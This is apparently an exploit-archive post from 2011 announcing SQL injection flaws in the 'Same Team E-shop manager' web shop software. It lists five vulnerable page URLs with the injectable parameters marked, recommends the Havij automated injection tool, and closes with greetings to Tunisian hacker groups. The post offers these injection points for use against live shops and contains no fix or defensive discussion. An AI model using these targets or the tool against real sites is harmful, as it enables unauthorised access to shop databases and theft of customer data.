# Exploit Title: [Same Team E-shop manager SQL Injection exploit] # Date: [19-06-2011] # Author: [Number 7] # Software Link: [http://www.sameteam.com.tn/site/fr/eshop-manager.23.html] # Tested on: [Linux] _____________________________________________________________________________ exploits: http://www.domain.com.tn/path/catalogue.php?id_shop=7[SQLI] http://www.domain.com.tn/path/article.php?id_article=7[SQLI] http://www.domain.com.tn/path/banniere.php?id_article=7[SQLI] http://www.domain.com.tn/path/detail_news.php?id_article=7[SQLI] http://www.domain.com.tn/path/detail_produit.php?id_shop=3&ref=200308G[SQLI] ----------------------------------------_---------------------------------------- Use Havij :^D it's fastest for the 4th version :D _____________________________________________________________________________ ############ Made in Tunisia +216 ############ [~] Greetz tO: [Shichemt-Älen/Ares/SWAT/S-MAN/Wx #all tunisian hackers] [~] Home : Tunisia :^D ############ Made in Tunisia +216 ############